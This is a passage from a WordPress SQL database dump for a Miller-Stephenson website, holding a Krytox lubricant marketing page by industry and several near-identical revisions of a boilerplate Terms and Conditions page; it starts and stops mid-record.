environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 14:32:06', '2016-09-29 14:32:06', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2150, 1, '2016-09-29 16:24:38', '2016-09-29 16:24:38', '<h2 style="text-align: center;">TERMS AND CONDITIONS</h2><ol><li><strong>Introduction</strong></li></ol><p>These Website Standard Terms and Conditions written on this webpage shall manage your use of this website. These Terms will be applied fully and affect to your use of this Website. By using this Website, you agreed to accept all terms and conditions written in here. You must not use this Website if you disagree with any of these Website Standard Terms and Conditions. </p><ol start="2"><li><strong>Intellectual Property Rights</strong></li></ol><p>Other than the content you own, under these Terms, Miller Stephenson, Inc and/or its licensors own all the intellectual property rights and materials contained in this Website.</p><p>You are granted limited license only for purposes of viewing the material contained on this Website.</p><ol start="3"><li><strong>Restrictions</strong></li></ol><p>You are specifically restricted from all of the following</p><ul><li>publishing any Website material in any other media;</li><li>selling, sublicensing and/or otherwise commercializing any Website material;</li><li>publicly performing and/or showing any Website material;</li><li>using this Website in any way that is or may be damaging to this Website;</li><li>using this Website in any way that impacts user access to this Website;</li><li>using this Website contrary to applicable laws and regulations, or in any way may cause harm to the Website, or to any person or business entity;</li><li>engaging in any data mining, data harvesting, data extracting or any other similar activity in relation to this Website;</li><li>using this Website to engage in any advertising or marketing.</li></ul><p>Certain areas of this Website are restricted from being access by you and Miller Stephenson, Inc may further restrict access by you to any areas of this Website, at any time, in absolute discretion. Any user ID and password you may have for this Website are confidential and you must maintain confidentiality as well.</p><ol start="4"><li><strong>Your Content</strong></li></ol><p>In these Website Standard Terms and Conditions, “Your Content” shall mean any audio, video text, images or other material you choose to display on this Website. By displaying Your Content, you grant Miller Stephenson, Inc a non-exclusive, worldwide irrevocable, sub licensable license to use, reproduce, adapt, publish, translate and distribute it in any and all media.</p><p>Your Content must be your own and must not be invading any third-party’s rights. Miller Stephenson, Inc reserves the right to remove any of Your Content from this Website at any time without notice.</p><ol start="5"><li><strong>No warranties</strong></li></ol><p>This Website is provided “as is,” with all faults, and Miller Stephenson, Inc express no representations or warranties, of any kind related to this Website or the materials contained on this Website. Also, nothing contained on this Website shall be interpreted as advising you.</p><ol start="6"><li><strong>Limitation of liability</strong></li></ol><p>In no event shall Miller Stephenson, Inc, nor any of its officers, directors and employees, shall be held liable for anything arising out of or in any way connected with your use of this Website whether such liability is under contract. &nbsp;Miller Stephenson, Inc, including its officers, directors and employees shall not be held liable for any indirect, consequential or special liability arising out of or in any way related to your use of this Website.</p><ol start="7"><li><strong>Indemnification</strong></li></ol><p>You hereby indemnify to the fullest extent Miller Stephenson, Inc from and against any and/or all liabilities, costs, demands, causes of action, damages and expenses arising in any way related to your breach of any of the provisions of these Terms.</p><ol start="8"><li><strong>Severability</strong></li></ol><p>If any provision of these Terms is found to be invalid under any applicable law, such provisions shall be deleted without affecting the remaining provisions herein.</p><ol start="9"><li><strong>Variation of Terms</strong></li></ol><p>Miller Stephenson, Inc is permitted to revise these Terms at any time as it sees fit, and by using this Website you are expected to review these Terms on a regular basis.</p><ol start="10"><li><strong>Assignment</strong></li></ol><p>The Miller Stephenson, Inc is allowed to assign, transfer, and subcontract its rights and/or obligations under these Terms without any notification. However, you are not allowed to assign, transfer, or subcontract any of your rights and/or obligations under these Terms.</p><ol start="11"><li><strong>Entire Agreement</strong></li></ol><p>These Terms constitute the entire agreement between Miller Stephenson, Inc and you in relation to your use of this Website, and supersede all prior agreements and understandings.</p><ol start="12"><li><strong>Governing Law &amp; Jurisdiction</strong></li></ol><p>These Terms will be governed by and interpreted in accordance with the laws of the State of CT, and you submit to the non-exclusive jurisdiction of the state and federal courts located in CT for the resolution of any disputes.</p><p></p>', 'Terms & Conditions', '', 'publish', 'closed', 'closed', '', 'terms-conditions', '', '', '2016-09-29 16:29:39', '2016-09-29 16:29:39', '', 0, 'https://www.miller-stephenson.com/?page_id=2150', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (2151, 1, '2016-09-29 16:23:43', '2016-09-29 16:23:43', '<h2 style="text-align: center;">TERMS AND CONDITIONS</h2><ol><li><strong>Introduction</strong></li></ol><p>These Website Standard Terms and Conditions written on this webpage shall manage your use of this website. These Terms will be applied fully and affect to your use of this Website. By using this Website, you agreed to accept all terms and conditions written in here. You must not use this Website if you disagree with any of these Website Standard Terms and Conditions. For an example of high-quality terms and conditions, visit <a href="https://ironlinkdirectory.com/" target="_blank">ironlinkdirectory.com</a>.</p><p>Minors or people below 18 years old are not allowed to use this Website.</p><ol start="2"><li><strong>Intellectual Property Rights</strong></li></ol><p>Other than the content you own, under these Terms, Miller Stephenson, Inc and/or its licensors own all the intellectual property rights and materials contained in this Website.</p><p>You are granted limited license only for purposes of viewing the material contained on this Website.</p><ol start="3"><li><strong>Restrictions</strong></li></ol><p>You are specifically restricted from all of the following</p><ul><li>publishing any Website material in any other media;</li><li>selling, sublicensing and/or otherwise commercializing any Website material;</li><li>publicly performing and/or showing any Website material;</li><li>using this Website in any way that is or may be damaging to this Website;</li><li>using this Website in any way that impacts user access to this Website;</li><li>using this Website contrary to applicable laws and regulations, or in any way may cause harm to the Website, or to any person or business entity;</li><li>engaging in any data mining, data harvesting, data extracting or any other similar activity in relation to this Website;</li><li>using this Website to engage in any advertising or marketing.</li></ul><p>Certain areas of this Website are restricted from being access by you and Miller Stephenson, Inc may further restrict access by you to any areas of this Website, at any time, in absolute discretion. Any user ID and password you may have for this Website are confidential and you must maintain confidentiality as well.</p><ol start="4"><li><strong>Your Content</strong></li></ol><p>In these Website Standard Terms and Conditions, “Your Content” shall mean any audio, video text, images or other material you choose to display on this Website. By displaying Your Content, you grant Miller Stephenson, Inc a non-exclusive, worldwide irrevocable, sub licensable license to use, reproduce, adapt, publish, translate and distribute it in any and all media.</p><p>Your Content must be your own and must not be invading any third-party’s rights. Miller Stephenson, Inc reserves the right to remove any of Your Content from this Website at any time without notice.</p><ol start="5"><li><strong>No warranties</strong></li></ol><p>This Website is provided “as is,” with all faults, and Miller Stephenson, Inc express no representations or warranties, of any kind related to this Website or the materials contained on this Website. Also, nothing contained on this Website shall be interpreted as advising you.</p><ol start="6"><li><strong>Limitation of liability</strong></li></ol><p>In no event shall Miller Stephenson, Inc, nor any of its officers, directors and employees, shall be held liable for anything arising out of or in any way connected with your use of this Website whether such liability is under contract. &nbsp;Miller Stephenson, Inc, including its officers, directors and employees shall not be held liable for any indirect, consequential or special liability arising out of or in any way related to your use of this Website.</p><ol start="7"><li><strong>Indemnification</strong></li></ol><p>You hereby indemnify to the fullest extent Miller Stephenson, Inc from and against any and/or all liabilities, costs, demands, causes of action, damages and expenses arising in any way related to your breach of any of the provisions of these Terms.</p><ol start="8"><li><strong>Severability</strong></li></ol><p>If any provision of these Terms is found to be invalid under any applicable law, such provisions shall be deleted without affecting the remaining provisions herein.</p><ol start="9"><li><strong>Variation of Terms</strong></li></ol><p>Miller Stephenson, Inc is permitted to revise these Terms at any time as it sees fit, and by using this Website you are expected to review these Terms on a regular basis.</p><ol start="10"><li><strong>Assignment</strong></li></ol><p>The Miller Stephenson, Inc is allowed to assign, transfer, and subcontract its rights and/or obligations under these Terms without any notification. However, you are not allowed to assign, transfer, or subcontract any of your rights and/or obligations under these Terms.</p><ol start="11"><li><strong>Entire Agreement</strong></li></ol><p>These Terms constitute the entire agreement between Miller Stephenson, Inc and you in relation to your use of this Website, and supersede all prior agreements and understandings.</p><ol start="12"><li><strong>Governing Law &amp; Jurisdiction</strong></li></ol><p>These Terms will be governed by and interpreted in accordance with the laws of the State of CT, and you submit to the non-exclusive jurisdiction of the state and federal courts located in CT for the resolution of any disputes.</p><p>These terms and conditions have been generated at <a href="https://termsandcondiitionssample.com/" target="_blank">termsandcondiitionssample.com</a>.</p>', 'Terms & Conditions', '', 'inherit', 'closed', 'closed', '', '2150-revision-v1', '', '', '2016-09-29 16:23:43', '2016-09-29 16:23:43', '', 2150, 'https://www.miller-stephenson.com/2150-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2152, 1, '2016-09-29 16:24:38', '2016-09-29 16:24:38', ' ', '', '', 'publish', 'closed', 'closed', '', '2152', '', '', '2016-09-29 16:24:38', '2016-09-29 16:24:38', '', 0, 'https://www.miller-stephenson.com/2152/', 10, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (2153, 1, '2016-09-29 16:24:38', '2016-09-29 16:24:38', '<h2 style="text-align: center;">TERMS AND CONDITIONS</h2><ol><li><strong>Introduction</strong></li></ol><p>These Website Standard Terms and Conditions written on this webpage shall manage your use of this website. These Terms will be applied fully and affect to your use of this Website. By using this Website, you agreed to accept all terms and conditions written in here. You must not use this Website if you disagree with any of these Website Standard Terms and Conditions. </p><p>Minors or people below 18 years old are not allowed to use this Website.</p><ol start="2"><li><strong>Intellectual Property Rights</strong></li></ol><p>Other than the content you own, under these Terms, Miller Stephenson, Inc and/or its licensors own all the intellectual property rights and materials contained in this Website.</p><p>You are granted limited license only for purposes of viewing the material contained on this Website.</p><ol start="3"><li><strong>Restrictions</strong></li></ol><p>You are specifically restricted from all of the following</p><ul><li>publishing any Website material in any other media;</li><li>selling, sublicensing and/or otherwise commercializing any Website material;</li><li>publicly performing and/or showing any Website material;</li><li>using this Website in any way that is or may be damaging to this Website;</li><li>using this Website in any way that impacts user access to this Website;</li><li>using this Website contrary to applicable laws and regulations, or in any way may cause harm to the Website, or to any person or business entity;</li><li>engaging in any data mining, data harvesting, data extracting or any other similar activity in relation to this Website;</li><li>using this Website to engage in any advertising or marketing.</li></ul><p>Certain areas of this Website are restricted from being access by you and Miller Stephenson, Inc may further restrict access by you to any areas of this Website, at any time, in absolute discretion. Any user ID and password you may have for this Website are confidential and you must maintain confidentiality as well.</p><ol start="4"><li><strong>Your Content</strong></li></ol><p>In these Website Standard Terms and Conditions, “Your Content” shall mean any audio, video text, images or other material you choose to display on this Website. By displaying Your Content, you grant Miller Stephenson, Inc a non-exclusive, worldwide irrevocable, sub licensable license to use, reproduce, adapt, publish, translate and distribute it in any and all media.</p><p>Your Content must be your own and must not be invading any third-party’s rights. Miller Stephenson, Inc reserves the right to remove any of Your Content from this Website at any time without notice.</p><ol start="5"><li><strong>No warranties</strong></li></ol><p>This Website is provided “as is,” with all faults, and Miller Stephenson, Inc express no representations or warranties, of any kind related to this Website or the materials contained on this Website. Also, nothing contained on this Website shall be interpreted as advising you.</p><ol start="6"><li><strong>Limitation of liability</strong></li></ol><p>In no event shall Miller Stephenson, Inc, nor any of its officers, directors and employees, shall be held liable for anything arising out of or in any way connected with your use of this Website whether such liability is under contract. &nbsp;Miller Stephenson, Inc, including its officers, directors and employees shall not be held liable for any indirect, consequential or special liability arising out of or in any way related to your use of this Website.</p><ol start="7"><li><strong>Indemnification</strong></li></ol><p>You hereby indemnify to the fullest extent Miller Stephenson, Inc from and against any and/or all liabilities, costs, demands, causes of action, damages and expenses arising in any way related to your breach of any of the provisions of these Terms.</p><ol start="8"><li><strong>Severability</strong></li></ol><p>If any provision of these Terms is found to be invalid under any applicable law, such provisions shall be deleted without affecting the remaining provisions herein.</p><ol start="9"><li><strong>Variation of Terms</strong></li></ol><p>Miller Stephenson, Inc is permitted to revise these Terms at any time as it sees fit, and by using this Website you are expected to review these Terms on a regular basis.</p><ol start="10"><li><strong>Assignment</strong></li></ol><p>The Miller Stephenson, Inc is allowed to assign, transfer, and subcontract its rights and/or obligations under these Terms without any notification. However, you are not allowed to assign, transfer, or subcontract any of your rights and/or obligations under these Terms.</p><ol start="11"><li><strong>Entire Agreement</strong></li></ol><p>These Terms constitute the entire agreement between Miller Stephenson, Inc and you in relation to your use of this Website, and supersede all prior agreements and understandings.</p><ol start="12"><li><strong>Governing Law &amp; Jurisdiction</strong></li></ol><p>These Terms will be governed by and interpreted in accordance with the laws of the State of CT, and you submit to the non-exclusive jurisdiction of the state and federal courts located in CT for the resolution of any disputes.</p><p>These terms and conditions have been generated at <a href="https://termsandcondiitionssample.com/" target="_blank">termsandcondiitionssample.com</a>.</p>', 'Terms & Conditions', '', 'inherit', 'closed', 'closed', '', '2150-revision-v1', '', '', '2016-09-29 16:24:38', '2016-09-29 16:24:38', '', 2150, 'https://www.miller-stephenson.com/2150-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2154, 1, '2016-09-29 16:24:55', '2016-09-29 16:24:55', '<h2 style="text-align: center;">TERMS AND CONDITIONS</h2><ol><li><strong>Introduction</strong></li></ol><p>These Website Standard Terms and Conditions written on this webpage shall manage your use of this website. These Terms will be applied fully and affect to your use of this Website. By using this Website, you agreed to accept all terms and conditions written in here. You must not use this Website if you disagree with any of these Website Standard Terms and Conditions. </p><p>Minors or people below 18 years old are not allowed to use this Website.</p><ol start="2"><li><strong>Intellectual Property Rights</strong></li></ol><p>Other than the content you own, under these Terms, Miller Stephenson, Inc and/or its licensors own all the intellectual property rights and materials contained in this Website.</p><p>You are granted limited license only for purposes of viewing the material contained on this Website.</p><ol start="3"><li><strong>Restrictions</strong></li></ol><p>You are specifically restricted from all of the following</p><ul><li>publishing any Website material in any other media;</li><li>selling, sublicensing and/or otherwise commercializing any Website material;</li><li>publicly performing and/or showing any Website material;</li><li>using this Website in any way that is or may be damaging to this Website;</li><li>using this Website in any way that impacts user access to this Website;</li><li>using this Website contrary to applicable laws and regulations, or in any way may cause harm to the Website, or to any person or business entity;</li><li>engaging in any data mining, data harvesting, data extracting or any other similar activity in relation to this Website;</li><li>using this Website to engage in any advertising or marketing.</li></ul><p>Certain areas of this Website are restricted from being access by you and Miller Stephenson, Inc may further restrict access by you to any areas of this Website, at any time, in absolute discretion. Any user ID and password you may have for this Website are confidential and you must maintain confidentiality as well.</p><ol start="4"><li><strong>Your Content</strong></li></ol><p>In these Website Standard Terms and Conditions, “Your Content” shall mean any audio, video text, images or other material you choose to display on this Website. By displaying Your Content, you grant Miller Stephenson, Inc a non-exclusive, worldwide irrevocable, sub licensable license to use, reproduce, adapt, publish, translate and distribute it in any and all media.</p><p>Your Content must be your own and must not be invading any third-party’s rights. Miller Stephenson, Inc reserves the right to remove any of Your Content from this Website at any time without notice.</p><ol start="5"><li><strong>No warranties</strong></li></ol><p>This Website is provided “as is,” with all faults, and Miller Stephenson, Inc express no representations or warranties, of any kind related to this Website or the materials contained on this Website. Also, nothing contained on this Website shall be interpreted as advising you.</p><ol start="6"><li><strong>Limitation of liability</strong></li></ol><p>In no event shall Miller Stephenson, Inc, nor any of its officers, directors and employees, shall be held liable for anything arising out of or in any way connected with your use of this Website whether such liability is under contract. &nbsp;Miller Stephenson, Inc, including its officers, directors and employees shall not be held liable for any indirect, consequential or special liability arising out of or in any way related to your use of this Website.</p><ol start="7"><li><strong>Indemnification</strong></li></ol><p>You hereby indemnify to the fullest extent Miller Stephenson, Inc from and against any and/or all liabilities, costs, demands, causes of action, damages and expenses arising in any way related to your breach of any of the provisions of these Terms.</p><ol start="8"><li><strong>Severability</strong></li></ol><p>If any provision of these Terms is found to be invalid under any applicable law, such provisions shall be deleted without affecting the remaining provisions herein.</p><ol start="9"><li><strong>Variation of Terms</strong></li></ol><p>Miller Stephenson, Inc is permitted to revise these Terms at any time as it sees fit, and by using this Website you are expected to review these Terms on a regular basis.</p><ol start="10"><li><strong>Assignment</strong></li></ol><p>The Miller Stephenson, Inc is allowed to assign, transfer, and subcontract its rights and/or obligations under these Terms without any notification. However, you are not allowed to assign, transfer, or subcontract any of your rights and/or obligations under these Terms.</p><ol start="11"><li><strong>Entire Agreement</strong></li></ol><p>These Terms constitute the entire agreement between Miller Stephenson, Inc and you in relation to your use of this Website, and supersede all prior agreements and understandings.</p><ol start="12"><li><strong>Governing Law &amp; Jurisdiction</strong></li></ol><p>These Terms will be governed by and interpreted in accordance with the laws of the State of CT, and you submit to the non-exclusive jurisdiction of the state and federal courts located in CT for the resolution of any disputes.</p><p>.</p>', 'Terms & Conditions', '', 'inherit', 'closed', 'closed', '', '2150-revision-v1', '', '', '2016-09-29 16:24:55', '2016-09-29 16:24:55', '', 2150, 'https://www.miller-stephenson.com/2150-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2155, 1, '2016-09-29 16:25:23', '2016-09-29 16:25:23', '<h2 style="text-align: center;">TERMS AND CONDITIONS</h2><ol><li><strong>Introduction</strong></li></ol><p>These Website Standard Terms and Conditions written on this webpage shall manage your use of this website. These Terms will be applied fully and affect to your use of this Website. By using this Website, you agreed to accept all terms and conditions written in here. You must not use this Website if you disagree with any of these Website Standard Terms and Conditions. </p><p>Minors or people below 18 years old are not allowed to use this Website.</p><ol start="2"><li><strong>Intellectual Property Rights</strong></li></ol><p>Other than the content you own, under these Terms, Miller Stephenson, Inc and/or its licensors own all the intellectual property rights and materials contained in this Website.</p><p>You are granted limited license only for purposes of viewing the material contained on this Website.</p><ol start="3"><li><strong>Restrictions</strong></li></ol><p>You are specifically restricted from all of the following</p><ul><li>publishing any Website material in any other media;</li><li>selling, sublicensing and/or otherwise commercializing any Website material;</li><li>publicly performing and/or showing any Website material;</li><li>using this Website in any way that is or may be damaging to this Website;</li><li>using this Website in any way that impacts user access to this Website;</li><li>using this Website contrary to applicable laws and regulations, or in any way may cause harm to the Website, or to any person or business entity;</li><li>engaging in any data mining, data harvesting, data extracting or any other similar activity in relation to this Website;</li><li>using this Website to engage in any advertising or marketing.</li></ul><p>Certain areas of this Website are restricted from being access by you and Miller Stephenson, Inc may further restrict access by you to any areas of this Website, at any time, in absolute discretion. Any user ID and password you may have for this Website are confidential and you must maintain confidentiality as well.</p><ol start="4"><li><strong>Your Content</strong></li></ol><p>In these Website Standard Terms and Conditions, “Your Content” shall mean any audio, video text, images or other material you choose to display on this Website. By displaying Your Content, you grant Miller Stephenson, Inc a non-exclusive, worldwide irrevocable, sub licensable license to use, reproduce, adapt, publish, translate and distribute it in any and all media.</p><p>Your Content must be your own and must not be invading any third-party’s rights. Miller Stephenson, Inc reserves the right to remove any of Your Content from this Website at any time without notice.</p><ol start="5"><li><strong>No warranties</strong></li></ol><p>This Website is provided “as is,” with all faults, and Miller Stephenson, Inc express no representations or warranties, of any kind related to this Website or the materials contained on this Website. Also, nothing contained on this Website shall be interpreted as advising you.</p><ol start="6"><li><strong>Limitation of liability</strong></li></ol><p>In no event shall Miller Stephenson, Inc, nor any of its officers, directors and employees, shall be held liable for anything arising out of or in any way connected with your use of this Website whether such liability is under contract. &nbsp;Miller Stephenson, Inc, including its officers, directors and employees shall not be held liable for any indirect, consequential or special liability arising out of or in any way related to your use of this Website.</p><ol start="7"><li><strong>Indemnification</strong></li></ol><p>You hereby indemnify to the fullest extent Miller Stephenson, Inc from and against any and/or all liabilities, costs, demands, causes of action, damages and expenses arising in any way related to your breach of any of the provisions of these Terms.</p><ol start="8"><li><strong>Severability</strong></li></ol><p>If any provision of these Terms is found to be invalid under any applicable law, such provisions shall be deleted without affecting the remaining provisions herein.</p><ol start="9"><li><strong>Variation of Terms</strong></li></ol><p>Miller Stephenson, Inc is permitted to revise these Terms at any time as it sees fit, and by using this Website you are expected to review these Terms on a regular basis.</p><ol start="10"><li><strong>Assignment</strong></li></ol><p>The Miller Stephenson, Inc is allowed to assign, transfer, and subcontract its rights and/or obligations under these Terms without any notification. However, you are not allowed to assign, transfer, or subcontract any of your rights and/or obligations under these Terms.</p><ol start="11"><li><strong>Entire Agreement</strong></li></ol><p>These Terms constitute the entire agreement between Miller Stephenson, Inc and you in relation to your use of this Website, and supersede all prior agreements and understandings.</p><ol start="12"><li><strong>Governing Law &amp; Jurisdiction</strong></li></ol><p>These Terms will be governed by and interpreted in accordance with the laws of the State of CT, and you submit to the non-exclusive jurisdiction of the state and federal courts located in CT for the resolution of any disputes.</p><p></p>', 'Terms & Conditions', '', 'inherit', 'closed', 'closed', '', '2150-revision-v1', '', '', '2016-09-29 16:25:23', '2016-09-29 16:25:23', '', 2150, 'https://www.miller-stephenson.com/2150-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2156, 1, '2016-09-29 16:29:39', '2016-09-29 16:29:39', '<h2 style="text-align: center;">TERMS AND CONDITIONS</h2><ol><li><strong>Introduction</strong></li></ol><p>These Website Standard Terms and Conditions written on this webpage shall manage your use of this website. These Terms will be applied fully and affect to your use of this Website. By using this Website, you agreed to accept all terms and conditions written in here. You must not use this Website if you disagree with any of these Website Standard Terms and Conditions. </p><ol start="2"><li><strong>Intellectual Property Rights</strong></li></ol><p>Other than the content you own, under these Terms, Miller Stephenson, Inc and/or its licensors own all the intellectual property rights and materials contained in this Website.</p><p>You are granted limited license only for purposes of viewing the material contained on this Website.</p><ol start="3"><li><strong>Restrictions</strong></li></ol><p>You are specifically restricted from all of the following</p><ul><li>publishing any Website material in any other media;</li><li>selling, sublicensing and/or otherwise commercializing any Website material;</li><li>publicly performing and/or showing any Website material;</li><li>using this Website in any way that is or may be damaging to this Website;</li><li>using this Website in any way that impacts user access to this Website;</li><li>using this Website contrary to applicable laws and regulations, or in any way may cause harm to the Website, or to any person or business entity;</li><li>engaging in any data mining, data harvesting, data extracting or any other similar activity in relation to this Website;</li><li>using this Website to engage in any advertising or marketing.</li></ul><p>Certain areas of this Website are restricted from being access by you and Miller Stephenson, Inc may further restrict access by you to any areas of this Website, at any time, in absolute discretion. Any user ID and password you may have for this Website are confidential and you must maintain confidentiality as well.</p><ol start="4"><li><strong>Your Content</strong></li></ol><p>In these Website Standard 